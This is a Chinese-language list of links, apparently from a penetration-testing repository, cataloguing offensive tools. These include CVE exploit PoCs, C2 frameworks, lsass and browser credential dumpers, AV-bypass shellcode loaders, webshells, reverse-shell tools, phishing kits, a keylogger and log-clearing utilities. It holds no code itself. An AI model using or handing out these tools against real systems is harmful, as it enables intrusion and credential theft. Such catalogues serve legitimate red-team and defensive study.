- [CVE-2023-27326: VM Escape for Parallels Desktop <18.1.1](https://github.com/Impalabs/CVE-2023-27326)
- [Windows_LPE_AFD_CVE-2023-21768: 用户权限提升漏洞](https://github.com/chompie1337/Windows_LPE_AFD_CVE-2023-21768)
- [nullmap: 使用CVE-2023-21768来手动映射内核模式驱动程序](https://github.com/SamuelTulach/nullmap)
- [CVE-2023-23397-POC-Powershell: Microsoft Outlook权限提升漏洞(危险的约会铃声)Powershell版本poc](https://github.com/api0cradle/CVE-2023-23397-POC-Powershell)
- [CVE-2023-0179: 影响了从5.5到6.2-rc3的所有Linux版本](https://github.com/H4K6/CVE-2023-0179-PoC)|[源处](https://github.com/TurtleARM/CVE-2023-0179-PoC)
- [Hades-C2: python开发的C2工具](https://github.com/Lavender-exe/Hades-C2)
- [CVE-2023-27363: Foxit PDF Reader及Editor任意代码执行漏洞](https://github.com/j00sean/SecBugs/tree/main/CVEs/CVE-2023-27363)
- [keepass-password-dumper: CVE-2023-32784 KeePass 信息泄露漏洞](https://github.com/vdohney/keepass-password-dumper)
## <span id="head7"> tools-小工具集版本合</span>
- [java环境下任意文件下载情况自动化读取源码的小工具](https://github.com/Artemis1029/Java_xmlhack)
- [Linux SSH登录日志清除/伪造](./tools/ssh)
- [python2的socks代理](./tools/s5.py)
- [dede_burp_admin_path-dedecms后台路径爆破(Windows环境)](./tools/dede_burp_admin_path.md)
- [PHP 7.1-7.3 disable_functions bypass](./tools/PHP%207.1-7.3%20disable_functions%20bypass.md)
- [一个各种方式突破Disable_functions达到命令执行的shell](https://github.com/l3m0n/Bypass_Disable_functions_Shell)
- [【PHP】bypass disable_functions via LD_PRELOA (no need /usr/sbin/sendmail)](https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD)
- [另一个bypass PHP的disable_functions](https://github.com/mm0r1/exploits)
- [cmd下查询3389远程桌面端口](./tools/cmd下查询3389远程桌面端口.md)
- [伪装成企业微信名片的钓鱼代码](./tools/伪装成企业微信名片的钓鱼代码.txt)
- [vbulletin5-rce利用工具(批量检测/getshell)](https://github.com/theLSA/vbulletin5-rce)/[保存了一份源码:vbulletin5-rce.py](./tools/vbulletin5-rce.py)
- [CVE-2017-12615](./tools/CVE-2017-12615.py)
- [通过Shodan和favicon icon发现真实IP地址](https://github.com/pielco11/fav-up)
- [Cobalt_Strike扩展插件](./tools/Cobalt_Strike扩展插件.md)
- [Windows命令行cmd的空格替换](./tools/Windows命令行cmd的空格替换.md)
- [绕过disable_function汇总](./tools/绕过disable_function汇总.md)
- [WAF Bypass](https://chybeta.gitbooks.io/waf-bypass/content/)
- [命令注入总结](./tools/命令注入总结.md)
- [隐藏wifi-ssid获取 · theKingOfNight's Blog](./books/隐藏wifi-ssid获取%20·%20theKingOfNight's%20Blog.pdf)
- [crt.sh证书/域名收集](./tools/crt.sh证书收集.py)
- [TP漏洞集合利用工具py3版本-来自奇安信大佬Lucifer1993](https://github.com/Mr-xn/TPscan)
- [TPScan.jar-Java编写的单文件版的TP漏洞扫描利用](./tools/TPScan.jar)-[源处](https://github.com/tangxiaofeng7/TPScan)
- [Python2编写的struts2漏洞全版本检测和利用工具-来自奇安信大佬Lucifer1993](https://github.com/Mr-xn/struts-scan)
- [sqlmap_bypass_D盾_tamper](./tools/sqlmap_bypass_D盾_tamper.py)
- [sqlmap_bypass_安全狗_tamper](./tools/sqlmap_bypass_安全狗_tamper.py)
- [sqlmap_bypass安全狗2tamper](./tools/sqlmap_bypass_安全狗2_tamper.py)
- [sqlmap_bypass_空格替换成换行符-某企业建站程序过滤_tamper](./tools/sqlmap_bypass_空格替换成换行符-某企业建站程序过滤_tamper.py)
- [sqlmap_bypass_云锁_tamper](./tools/sqlmap_bypass_云锁_tamper.py)
- [sqlmap bypass云锁tamper(利用云锁的注释不拦截缺陷,来自t00ls师傅)](https://github.com/Hsly-Alexsel/Bypass)-[t00ls原文地址](https://www.t00ls.net/thread-57788-1-1.html)|[项目留存PDF版本](./books/10种方法绕过云锁以及tamper.pdf)
- [masscan+nmap扫描脚本](./tools/masscan%2Bnmap.py)
- [PHP解密扩展](https://github.com/Albert-Zhan/php-decrypt)
- [linux信息收集/应急响应/常见后门检测脚本](https://github.com/al0ne/LinuxCheck)
- [RdpThief-从远程桌面客户端提取明文凭据辅助工具](https://github.com/0x09AL/RdpThief)
- [使用powershell或CMD直接运行命令反弹shell](https://github.com/ZHacker13/ReverseTCPShell)
- [GitHack-.git泄露利用脚本](https://github.com/lijiejie/GitHack)
- [GitHacker---比GitHack更好用的git泄露利用脚本](https://github.com/WangYihang/GitHacker)
- [git-dumper:一款优秀的.git泄漏文件dump工具](https://github.com/arthaud/git-dumper)
- [GitHackTool:号称Git信息泄露唯一可用工具](https://github.com/safesword/GitHackTool)
- [SVN源代码泄露全版本Dump源码](https://github.com/admintony/svnExploit)
- [dumpall-多种泄漏形式,一种利用方式【支持.git源代码泄漏.svn源代码泄漏.DS_Store信息泄漏目录列出信息泄漏】](https://github.com/0xHJK/dumpall)
- [ds_store_exp:.DS_Store 文件泄漏利用脚本,它解析.DS_Store文件并递归地下载文件到本地](https://github.com/lijiejie/ds_store_exp)
- [多进程批量网站备份文件扫描](https://github.com/sry309/ihoneyBakFileScan)
- [Empire](https://github.com/BC-SECURITY/Empire/)|相关文章:[后渗透测试神器Empire详解](https://mp.weixin.qq.com/s/xCtkoIwVomx5f8hVSoGKpA)
- [FOFA Pro view 是一款FOFA Pro 资产展示浏览器插件,目前兼容 Chrome、Firefox、Opera](https://github.com/0nise/fofa_view)
- [Zoomeye Tools-一款利用Zoomeye 获取有关当前网页IP地址的各种信息(需要登录)](https://chrome.google.com/webstore/detail/zoomeye-tools/bdoaeiibkccgkbjbmmmoemghacnkbklj)
- [360 0Kee-Team 的 crawlergo动态爬虫 结合 长亭XRAY扫描器的被动扫描功能](https://github.com/timwhitez/crawlergo_x_XRAY)
- [内网神器Xerosploit-娱乐性质(端口扫描|DoS攻击|HTML代码注入|JavaScript代码注入|下载拦截和替换|嗅探攻击|DNS欺骗|图片替换|Web页面篡改|Drifnet)](https://github.com/LionSec/xerosploit)
- [一个包含php,java,python,C#等各种语言版本的XXE漏洞Demo](https://github.com/c0ny1/xxe-lab)
- [内网常见渗透工具包](https://github.com/yuxiaokui/Intranet-Penetration)
- [从内存中加载 SHELLCODE bypass AV查杀](https://github.com/brimstone/go-shellcode)|[twitter示例](https://twitter.com/jas502n/status/1213847002947051521)
- [流量转发工具-pingtunnel是把tcp/udp/sock5流量伪装成icmp流量进行转发的工具](https://github.com/esrrhs/pingtunnel)
- [内网渗透-创建Windows用户(当net net1 等常见命令被过滤时,一个文件执行直接添加一个管理员【需要shell具有管理员权限l】](https://github.com/newsoft/adduser)|[adduser使用方法](./adduser添加用户.md) |[【windows】绕过杀软添加管理员用户的两种方法](https://github.com/lengjibo/RedTeamTools/tree/master/windows/bypass360%E5%8A%A0%E7%94%A8%E6%88%B7)|[【windows】使用vbs脚本添加管理员用户](./使用vbs脚本添加管理员用户.md)
- [NetUser-使用windows api添加用户,可用于net无法使用时(支持Nim版本)](https://github.com/lengjibo/NetUser)
- [pypykatz-通过python3实现完整的Mimikatz功能(python3.6+)](https://github.com/skelsec/pypykatz)
- [【windows】Bypassing AV via in-memory PE execution-通过在内存中加载多次XOR后的payload来bypass杀软](https://blog.dylan.codes/bypassing-av-via/)|[作者自建gitlab地址](https://git.dylan.codes/batman/darkarmour)
- [wafw00f-帮助你快速识别web应用是否使用何种WAF(扫描之前很有用)](https://github.com/EnableSecurity/wafw00f)
- [Linux提取其他用户密码的工具(需要root权限)](https://github.com/huntergregal/mimipenguin)
- [apache2_BackdoorMod-apache后门模块](https://github.com/VladRico/apache2_BackdoorMod)
- [对密码已保存在 Windwos 系统上的部分程序进行解析,包括:Navicat,TeamViewer,FileZilla,WinSCP,Xmangager系列产品(Xshell,Xftp)](https://github.com/uknowsec/SharpDecryptPwd)
- [一个简单探测jboss漏洞的工具](https://github.com/GGyao/jbossScan)
- [一款lcx在golang下的实现-适合内网代理流量到公网,比如阿里云的机器代理到你的公网机器](https://github.com/cw1997/NATBypass)
- [Cobalt Strike Aggressor 插件包](https://github.com/timwhitez/Cobalt-Strike-Aggressor-Scripts)
- [Erebus-Cobalt Strike后渗透测试插件,包括了信息收集、权限获取、密码获取、痕迹清除等等常见的脚本插件](https://github.com/DeEpinGh0st/Erebus)|[Aggressor:巨龙拉冬集成的 cobaltstrike 插件](https://github.com/k8gege/Aggressor)
- [cobaltstrike后渗透插件,偏向内网常用工具(目前包含1.定位域管理员2.信息收集(采用ADfind)3.权限维持(增加了万能密码,以及白银票据)4.内网扫描(nbtscan(linux/windows通用))5.dump数据库hash(支持mysql/mssql(快速获取数据库的hash值)))](https://github.com/wafinfo/cobaltstrike)
- [AggressorScripts-适用于Cobalt Strike 3.x & 4.x 的插件【信息搜集/提权/定位域管/读取密码/内网扫描/RDP相关/添加用户/内网穿透/权限维持/日志清除/辅助模块/】](https://github.com/z1un/Z1-AggressorScripts)
- [IP/IP段资产扫描-->扫描开放端口识别运行服务部署网站-->自动化整理扫描结果-->输出可视化报表+整理结果](https://github.com/LangziFun/LangNetworkTopology3)
- [A script to scan for unsecured Laravel .env files](https://github.com/tismayil/laravelN00b)
- [STS2G-Struts2漏洞扫描Golang版-【特点:单文件、全平台支持、可在webshell下使用】](https://github.com/x51/STS2G)|[编译好的Windows版本](./tools/ST2G.exe)|[Linux版本](./tools/ST2SG_linux)
- [Struts2_Chek_BypassWAF.jar-struts2全版本漏洞测试工具17-6过WAF版 by:ABC_123 仅供天融信内部使用,勿用于非法用途](./tools/Struts2_Chek_BypassWAF.jar)
- [ShiroScan-Shiro<=1.2.4反序列化,一键检测工具](https://github.com/sv3nbeast/ShiroScan)|[Apache shiro <= 1.2.4 rememberMe 反序列化漏洞利用工具](https://github.com/acgbfull/Apache_Shiro_1.2.4_RCE)|[ShiroScan-Shiro RememberMe 1.2.4 反序列化漏洞图形化检测工具(Shiro-550)](https://github.com/fupinglee/ShiroScan)|[shiro_attack-shiro反序列化漏洞综合利用,包含(回显执行命令/注入内存马,支持shiro > 1.4.2 )](https://github.com/j1anFen/shiro_attack)-[shiro_attack_1.5.zip下载](./tools/shiro_attack_1.5.zip)|[又一个Shiro反序列化利用工具](https://github.com/LWZXS/JavaTools)
- [weblogicScanner-完整weblogic 漏洞扫描工具修复版](https://github.com/0xn0ne/weblogicScanner)
- [GitHub敏感信息泄露监控](https://github.com/FeeiCN/GSIL)
- [Java安全相关的漏洞和技术demo](https://github.com/threedr3am/learnjavabug)
- [在线扫描-网站基础信息获取|旁站|端口扫描|信息泄露](https://scan.top15.cn/web/)
- [bayonet是一款src资产管理系统,从子域名、端口服务、漏洞、爬虫等一体化的资产管理系统](https://github.com/CTF-MissFeng/bayonet)
- [SharpToolsAggressor-内网渗透中常用的c#程序整合成cs脚本,直接内存加载](https://github.com/uknowsec/SharpToolsAggressor)
- [【漏洞库】又一个各种漏洞poc、Exp的收集或编写](https://github.com/coffeehb/Some-PoC-oR-ExP)
- [【内网代理】内网渗透代理转发利器reGeorg](https://github.com/sensepost/reGeorg)|相关文章:[配置reGeorg+Proxifier渗透内网](https://www.k0rz3n.com/2018/07/06/如何使用reGeorg+Proxifier渗透内网)|[reGeorg+Proxifier实现内网sock5代理](http://jean.ink/2018/04/26/reGeorg/)|[内网渗透之reGeorg+Proxifier](https://sky666sec.github.io/2017/12/16/内网渗透之reGeorg-Proxifier)|[reGeorg+Proxifier使用](https://xz.aliyun.com/t/228)
- [【内网代理】Neo-reGeorg重构的reGeorg ](https://github.com/L-codes/Neo-reGeorg)
- [【内网代理】Tunna-通过http隧道将TCP流量代理出来](https://github.com/SECFORCE/Tunna)
- [【内网代理】proxy.php-单文件版的php代理](https://github.com/mcnemesis/proxy.php)
- [【内网代理】pivotnacci-通过HTTP隧道将TCP流量代理出来或进去](https://github.com/blackarrowsec/pivotnacci)
- [【内网代理】毒刺(pystinger)通过webshell实现**内网SOCK4代理**,**端口映射**.](https://github.com/FunnyWolf/pystinger)|[pystinger.zip-下载](./tools/pystinger.zip)
- [【内网代理】php-proxy-app-一款代理访问网站的工具](https://github.com/Athlon1600/php-proxy-app)
- [【内网代理】reDuh-通过http隧道搭建代理(比较远古,酌情使用)](https://github.com/sensepost/reDuh)
- [【内网代理】chisel:一款快速稳定的隧道工具(通过HTTP传输使用SSH加密)](https://github.com/jpillora/chisel) - [相关文章介绍](https://www.anquanke.com/post/id/234771)
- [【内网代理】Ecloud是一款基于http/1.1协议传输TCP流量的工具,适用于内网不出网时通过web代理脚本转发tcp流量,以达到socket5隧道、内网cs等程序上线、反弹虚拟终端等功能](https://github.com/CTF-MissFeng/Ecloud)
- [【内网代理】Stowaway:一个利用go语言编写、专为渗透测试工作者制作的多级代理工具](https://github.com/ph4ntonn/Stowaway)
- [【内网代理】FastTunnel:高性能跨平台的内网穿透解决方案](https://github.com/FastTunnel/FastTunnel)
- [get_Team_Pass-获取目标机器上的teamviewerID和密码(你需要具有有效的目标机器账号密码且目标机器445端口可以被访问(开放445端口))](https://github.com/kr1shn4murt1/get_Team_Pass/)
- [chromepass-获取chrome保存的账号密码/cookies-nirsoft出品在win10+chrome 80测试OK](./tools/chromepass/)|[SharpChrome-基于.NET 2.0的开源获取chrome保存过的账号密码/cookies/history](https://github.com/djhohnstein/SharpChrome)|[ChromePasswords-开源获取chrome密码/cookies工具](https://github.com/malcomvetter/ChromePasswords)
- [java-jdwp远程调试利用](https://github.com/Lz1y/jdwp-shellifier)|相关文章:[jdwp远程调试与安全](https://qsli.github.io/2018/08/12/jdwp/)
- [社会工程学密码生成器,是一个利用个人信息生成密码的工具](https://github.com/zgjx6/SocialEngineeringDictionaryGenerator)
- [云业CMS(yunyecms)的多处SQL注入审计分析](./books/云业CMS(yunyecms)的多处SQL注入审计分析.pdf)|[原文地址](https://xz.aliyun.com/t/7302)|[官网下载地址](http://www.yunyecms.com/index.php?m=version&c=index&a=index)|[sqlmap_yunyecms_front_sqli_tamp.py](./tools/sqlmap_yunyecms_front_sqli_tamp.py)
- [www.flash.cn 的钓鱼页,中文+英文](https://github.com/r00tSe7en/Fake-flash.cn)|[Flash-Pop:flash 钓鱼弹窗优化版](https://github.com/r00tSe7en/Flash-Pop)|[Flash-Pop2:Flash-Pop升级版](https://github.com/chroblert/Flash-Pop2)
- [织梦dedecms全版本漏洞扫描](https://github.com/Mr-xn/dedecmscan)
- [CVE、CMS、中间件漏洞检测利用合集 Since 2019-9-15](https://github.com/mai-lang-chai/Middleware-Vulnerability-detection)
- [Dirble -快速目录扫描和爬取工具【比dirsearch和dirb更快】](https://github.com/nccgroup/dirble)
- [RedRabbit - Red Team PowerShell脚本](https://github.com/securethelogs/RedRabbit)
- [Pentest Tools Framework - 渗透测试工具集-适用于Linux系统](https://github.com/pikpikcu/Pentest-Tools-Framework)
- [白鹿社工字典生成器,灵活与易用兼顾。](https://github.com/HongLuDianXue/BaiLu-SED-Tool)
- [NodeJsScan-一款转为Nodejs进行静态代码扫描开发的工具](https://github.com/ajinabraham/NodeJsScan)
- [一款国人根据poison ivy重写的远控](https://github.com/killeven/Poison-Ivy-Reload)
- [NoXss-可配合burpsuite批量检测XSS](https://github.com/lwzSoviet/NoXss)
- [fofa 采集脚本](https://raw.githubusercontent.com/ggg4566/SomeTools/master/fofa_search.py)
- [java web 压缩文件 安全 漏洞](https://github.com/jas502n/Java-Compressed-file-security)
- [可以自定义规则的密码字典生成器,支持图形界面](https://github.com/bit4woo/passmaker)
- [dump lass 工具(绕过/干掉卡巴斯基)](./books/dump%20lass%20工具.pdf)|[loader.zip下载](./tools/loader.zip)
- [GO语言版本的mimikatz-编译后免杀](https://github.com/vyrus001/go-mimikatz)
- [CVE-2019-0708-批量检测扫描工具](./tools/cve0708.rar)
- [dump lsass的工具](https://github.com/outflanknl/Dumpert)|[又一个dump lsass的工具](https://github.com/7hmA3s/dump_lsass)|[DumpThatLSASS:又一款bypass AV dump工具](https://github.com/D1rkMtr/DumpThatLSASS)|[CallBackDump:能过卡巴、核晶、defender等杀软的dump lsass进程工具](https://github.com/seventeenman/CallBackDump)
- [Cobalt Strike插件 - RDP日志取证&清除](https://github.com/QAX-A-Team/EventLogMaster)
- [xencrypt-一款利用powershell来加密并采用Gzip/DEFLATE来绕过杀软的工具](https://github.com/the-xentropy/xencrypt)
- [SessionGopher-一款采用powershell来解密Windows机器上保存的session文件,例如: WinSCP, PuTTY, SuperPuTTY, FileZilla, and Microsoft Remote Desktop,支持远程加载和本地加载使用](https://github.com/Arvanaghi/SessionGopher)
- [CVE-2020-0796 Local Privilege Escalation POC-python版本](https://github.com/ZecOps/CVE-2020-0796-LPE-POC)|[CVE-2020-0796 Remote Code Execution POC](https://github.com/ZecOps/CVE-2020-0796-RCE-POC)
- [Windows杀软在线对比辅助](https://github.com/r00tSe7en/get_AV)
- [递归式寻找域名和api](https://github.com/p1g3/JSINFO-SCAN)
- [mssqli-duet-用于mssql的sql注入脚本,使用RID爆破,从Active Directory环境中提取域用户](https://github.com/Keramas/mssqli-duet)
- [【Android 移动app渗透】之一键提取APP敏感信息](https://github.com/TheKingOfDuck/ApkAnalyser)
- [【android 移动app渗透】apkleaks-扫描APK文件提取URL、终端和secret](https://github.com/dwisiswant0/apkleaks)
- [ShiroExploit-Deprecated-Shiro系列漏洞检测GUI版本-ShiroExploit GUI版本](https://github.com/feihong-cs/ShiroExploit-Deprecated)
- [通过phpinfo获取cookie突破httponly](./通过phpinfo获取cookie突破httponly.md)
- [phpstudy RCE 利用工具 windows GUI版本](https://github.com/aimorc/phpstudyrce)
- [WebAliveScan-根据端口快速扫描存活的WEB](https://github.com/broken5/WebAliveScan)
- [bscan-bscan的是一款强大、简单、实用、高效的HTTP扫描器。(WebAliveScan的升级版本)](https://github.com/broken5/bscan)
- [扫描可写目录.aspx](./tools/扫描可写目录.aspx)
- [PC客户端(C-S架构)渗透测试](https://github.com/theLSA/CS-checklist)
- [wsltools-web扫描辅助python库](https://github.com/Symbo1/wsltools)
- [struts2_check-用于识别目标网站是否采用Struts2框架开发的工具](https://github.com/coffeehb/struts2_check)
- [sharpmimi.exe-免杀版mimikatz](./tools/sharpmimi.exe)
- [thinkPHP代码执行批量检测工具](https://github.com/admintony/thinkPHPBatchPoc)
- [pypykatz-用纯Python实现的Mimikatz](https://github.com/skelsec/pypykatz)
- [Flux-Keylogger-具有Web面板的现代Javascript键盘记录器](https://github.com/LimerBoy/Flux-Keylogger)
- [JSINFO-SCAN-递归式寻找域名和api](https://github.com/p1g3/JSINFO-SCAN)
- [FrameScan-GUI 一款python3和Pyqt编写的具有图形化界面的cms漏洞检测框架](https://github.com/qianxiao996/FrameScan-GUI)
- [SRC资产信息聚合网站](https://github.com/cckuailong/InformationGather)
- [Spring Boot Actuator未授权访问【XXE、RCE】单/多目标检测](https://github.com/rabbitmask/SB-Actuator)
- [JNDI 注入利用工具【Fastjson、Jackson 等相关漏洞】](https://github.com/JosephTribbianni/JNDI)|[JNDIExploit](https://github.com/0x727/JNDIExploit)|[JNDIExploit](https://github.com/WhiteHSBG/JNDIExploit)|[JNDI-Exploit-Kit](https://github.com/pimps/JNDI-Exploit-Kit)|[JNDIScan:无须借助dnslog且完全无害的JNDI反连检测工具,解析RMI和LDAP协议实现,可用于甲方内网自查](https://github.com/EmYiQing/JNDIScan)|[JNDI-Inject-Exploit:解决FastJson、Jackson、Log4j2、原生JNDI注入漏洞的高版本JDKBypass利用,探测本地可用反序列化gadget达到命令执行、回显命令执行、内存马注入(支持JNDI注入高版本JDK Bypass命令回显、内存马注入)](https://github.com/exp1orer/JNDI-Inject-Exploit)|[MYJNDIExploit:一款用于 `JNDI注入` 利用的工具,大量参考/引用了 `Rogue JNDI` 项目的代码,支持直接`植入内存shell`,并集成了常见的`bypass 高版本JDK`的方式,适用于与自动化工具配合使用](https://github.com/achuna33/MYJNDIExploit)|[jndi_tool:JNDI服务利用工具 RMI/LDAP,支持部分场景回显、内存shell,高版本JDK场景下利用等,fastjson rce命令执行,log4j rce命令执行 漏洞检测辅助工具](https://github.com/wyzxxz/jndi_tool)
- [fastjson_rec_exploit-fastjson一键命令执行(python版本)](https://github.com/mrknow001/fastjson_rec_exploit)|[FastjsonExploit:fastjson漏洞快速利用框架](https://github.com/c0ny1/FastjsonExploit)|[fastjsonScan:fastjson漏洞burp插件](https://github.com/zilong3033/fastjsonScan)
- [各种反弹shell的语句集合页面](https://krober.biz/misc/reverse_shell.php)
- [解密weblogic AES或DES加密方法](https://github.com/Ch1ngg/WebLogicPasswordDecryptorUi)
- [使用 sshLooterC 抓取 SSH 密码](https://github.com/mthbernardes/sshLooterC)|[相关文章](https://www.ch1ng.com/blog/208.html)|[本地版本](./books/使用sshLooterC抓取SSH密码.pdf)
- [redis-rogue-server-Redis 4.x/5.x RCE](https://github.com/AdministratorGithub/redis-rogue-server)
- [Rogue-MySql-Server-搭建mysql虚假服务端来读取链接的客户端的文件](https://github.com/allyshka/Rogue-MySql-Server)
- [ew-内网穿透(跨平台)](https://github.com/idlefire/ew)
- [xray-weblisten-ui-一款基于GO语言写的Xray 被动扫描管理](https://github.com/virink/xray-weblisten-ui)
- [SQLEXP-SQL 注入利用工具,存在waf的情况下自定义编写tamper脚本 dump数据](https://github.com/ggg4566/SQLEXP)
- [SRC资产在线管理系统 - Shots](https://github.com/broken5/Shots)
- [luject:可以将动态库静态注入到指定应用程序包的工具,目前支持Android/iPhonsOS/Windows/macOS/Linux](https://github.com/lanoox/luject)|[相关文章](https://tboox.org/cn/2020/04/26/luject/)
- [CursedChrome:Chrome扩展植入程序,可将受害Chrome浏览器转变为功能齐全的HTTP代理,使你能够以受害人身份浏览网站](https://github.com/mandatoryprogrammer/CursedChrome)
- [pivotnacci:通过HTTP隧道进行Socks连接](https://github.com/blackarrowsec/pivotnacci)
- [PHPFuck-一款适用于php7以上版本的代码混淆](https://github.com/splitline/PHPFuck)|[PHPFuck在线版本](https://splitline.github.io/PHPFuck/)
- [冰蝎 bypass open_basedir 的马](./tools/冰蝎bypass_open_basedir_shell.md)
- [goproxy heroku 一键部署套装,把heroku变为免费的http(s)\socks5代理](https://github.com/snail007/goproxy-heroku)
- [xFTP6密码解密](./tools/xFTP6密码解密.md)
- [Mars-战神TideSec出品的WDScanner的重写一款综合的漏洞扫描,资产发现/变更,域名监控/子域名挖掘,Awvs扫描,POC检测,web指纹探测、端口指纹探测、CDN探测、操作系统指纹探测、泛解析探测、WAF探测、敏感信息检测等等工具](https://github.com/TideSec/Mars)
- [Shellcode Compiler:用于生成Windows 和 Linux平台的shellcode工具](https://github.com/NytroRST/ShellcodeCompiler)
- [BadDNS 是一款使用 Rust 开发的使用公共 DNS 服务器进行多层子域名探测的极速工具](https://github.com/joinsec/BadDNS)
- [【Android脱壳】XServer是一个用于对方法进行分析的Xposed插件](https://github.com/monkeylord/XServer)|[相关文章:Xposed+XServer无需脱壳抓取加密包](https://xz.aliyun.com/t/7669)|[使用xserver对某应用进行不脱壳抓加密包](https://blog.csdn.net/nini_boom/article/details/104400619)
- [masscan_to_nmap-基于masscan和nmap的快速端口扫描和指纹识别工具](https://github.com/7dog7/masscan_to_nmap)
- [Evilreg -使用Windows注册表文件的反向Shell (.Reg)](https://github.com/thelinuxchoice/evilreg)
- [Shecodject工具使用python注入shellcode bypass 火絨,360,windows defender](https://github.com/TaroballzChen/Shecodject)
- [Malleable-C2-Profiles-Cobalt Strike的C2隐藏配置文件相关](https://github.com/xx0hcd/Malleable-C2-Profiles)|[渗透利器Cobalt Strike - 第2篇 APT级的全面免杀与企业纵深防御体系的对抗](https://xz.aliyun.com/t/4191)
- [AutoRemove-自动卸载360](https://github.com/DeEpinGh0st/AutoRemove)
- [ligolo:用于渗透时反向隧道连接工具](https://github.com/sysdream/ligolo)
- [RMIScout: Java RMI爆破工具](https://github.com/BishopFox/rmiscout)
- [【Android脱壳】FRIDA-DEXDump-【使用Frida来进行Android脱壳】](https://github.com/hluwa/FRIDA-DEXDump)
- [XAPKDetector-全平台的android查壳工具](https://github.com/horsicq/XAPKDetector)
- [Donut-Shellcode生成工具](https://github.com/TheWover/donut)
- [JSP-Webshells集合【2020最新bypass某云检测可用】](https://github.com/threedr3am/JSP-Webshells)
- [one-scan-多合一网站指纹扫描器,轻松获取网站的 IP / DNS 服务商 / 子域名 / HTTPS 证书 / WHOIS / 开发框架 / WAF 等信息](https://github.com/Jackeriss/one-scan)
- [ServerScan一款使用Golang开发的高并发网络扫描、服务探测工具。](https://github.com/Adminisme/ServerScan)
- [域渗透-Windows hash dump之secretsdump.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py)|[相关文章](https://github.com/PythonPig/PythonPig.github.io/blob/730be0e55603df96f45680c25c56ba8148052d2c/_posts/2019-07-16-Windows%20hash%20dump%E4%B9%8Bsecretsdump.md)
- [WindowsVulnScan:基于主机的漏洞扫描工【类似windows-exp-suggester】](https://github.com/chroblert/WindowsVulnScan)
- [SpoofWeb:一键部署HTTPS钓鱼站](https://github.com/klionsec/SpoofWeb)
- [VpsEnvInstall:一键部署VPS渗透环境](https://github.com/klionsec/VpsEnvInstall)
- [tangalanga:Zoom会议扫描工具](https://github.com/elcuervo/tangalanga)
- [碎遮SZhe_Scan Web漏洞扫描器,基于python Flask框架,对输入的域名/IP进行全面的信息搜集,漏洞扫描,可自主添加POC](https://github.com/Cl0udG0d/SZhe_Scan)
- [Taie-RedTeam-OS-泰阿安全实验室-基于XUbuntu私人订制的红蓝对抗渗透操作系统](https://github.com/taielab/Taie-RedTeam-OS)
- [naiveproxy-一款用C语言编写类似于trojan的代理工具](https://github.com/klzgrad/naiveproxy)
- [BrowserGhost-一个抓取浏览器密码的工具,后续会添加更多功能](https://github.com/QAX-A-Team/BrowserGhost)
- [GatherInfo-渗透测试信息搜集/内网渗透信息搜集](https://github.com/Paper-Pen/GatherInfo)
- [EvilPDF:一款把恶意文件嵌入在 PDF 中的工具](https://github.com/thelinuxchoice/evilpdf)
- [SatanSword-红队综合渗透框架,支持web指纹识别、漏洞PoC检测、批量web信息和端口信息查询、路径扫描、批量JS查找子域名、使用google headless、协程支持、完整的日志回溯](https://github.com/Lucifer1993/SatanSword)
- [Get-WeChat-DB-获取目标机器的微信数据库和密钥](https://github.com/A2kaid/Get-WeChat-DB)
- [ThinkphpRCE-支持代理IP池的批量检测Thinkphp漏洞或者日志泄露的py3脚本](https://github.com/sukabuliet/ThinkphpRCE)
- [fakelogonscreen-伪造(Windows)系统登录页面,截获密码](https://github.com/bitsadmin/fakelogonscreen)
- [WMIHACKER-仅135端口免杀横向移动](https://github.com/360-Linton-Lab/WMIHACKER)|[使用方法以及介绍](./books/WMIHACKER(仅135端口免杀横向移动).pdf)|[横向移动工具WMIHACKER](./books/横向移动工具WMIHACKER.pdf)|[原文链接](https://www.anquanke.com/post/id/209665)
- [cloud-ranges-部分公有云IP地址范围](https://github.com/pry0cc/cloud-ranges)
- [sqltools_ch-sqltools2.0汉化增强版](./ttools/sqltools_ch.rar)
- [railgun-poc_1.0.1.7-多功能端口扫描/爆破/漏洞利用/编码转换等](./tools/railgun-poc_1.0.1.7.zip)|[railgun作者更新到GitHub了,目前是1.2.8版本](https://github.com/lz520520/railgun)|[railgun-v1.2.8.zip-存档](./tools/railgun.zip)
- [dede_funcookie.php-DEDECMS伪随机漏洞分析 (三) 碰撞点(爆破,伪造管理员cookie登陆后台getshell](./tools/dede_funcookie.php)
- [WAScan-一款功能强大的Web应用程序扫描工具【基于python开发的命令行扫描器】](https://github.com/m4ll0k/WAScan)
- [Peinject_dll-Cobalt Strike插件之另类持久化方法-PE感染](https://github.com/m0ngo0se/Peinject_dll)
- [MSSQL_BackDoor-摆脱MSSMS和 Navicat 调用执行 sp_cmdExec](https://github.com/evi1ox/MSSQL_BackDoor)
- [xShock-一款针对Shellshock漏洞的利用工具【例如低版本cgi的默认配置页面进行利用】](https://github.com/capture0x/xShock/)
- [tini-tools-针对红蓝对抗各个场景使用的小工具-【主要是Java写的工具】【目前有phpstudy.jar和域名转IP工具.jar】](https://github.com/sunird/tini-tools)
- [code6-码小六是一款 GitHub 代码泄露监控系统,通过定期扫描 GitHub 发现代码泄露行为](https://github.com/4x99/code6)
- [taowu-cobalt-strike-适用于cobalt strike3.x与cobalt strike4.x的插件](https://github.com/pandasec888/taowu-cobalt-strike)
- [Weblogic-scan-Weblogic 漏洞批量扫描工具](./tools/Weblogic-scan)
- [revp:反向HTTP代理,支持Linux,Windows和macOS](https://github.com/jafarlihi/revp)
- [fofa2Xray-一款联合fofa与xray的自动化批量扫描工具,使用Golang编写,适用于windows与linux](https://github.com/piaolin/fofa2Xray)
- [CasExp-Apereo CAS 反序列化利用工具](https://github.com/potats0/CasExp)
- [C_Shot-shellcode远程加载器](https://github.com/anthemtotheego/C_Shot)|[相关文章](./books/C_shot–shellcode远程加载器.pdf)
- [dz_ml_rce.py-Discuz! ml RCE漏洞利用工具](./tools/dz_ml_rce.py)
- [Redis未授权访问漏洞利用工具](./tools/Redis_Exp-by_PANDA墨森.zip)
- [Shiro 回显利用工具](./tools/shiroPoc-1.0-SNAPSHOT-jar-with-dependencies_20200726_130831.jar)|[相关文章](./books/Shiro_回显利用工具.pdf)
- [GetIPinfo-用于寻找多网卡主机方便内网跨网段渗透避免瞎打找不到核心网](https://github.com/r35tart/GetIPinfo)
- [Layer子域名挖掘机-Layer5.0 SAINTSEC](https://github.com/euphrat1ca/LayerDomainFinder)
- [cve_2020_14644.jar-Weblogic 远程命令执行漏洞(CVE-2020-14644)回显利用工具](./tools/cve_2020_14644.jar)
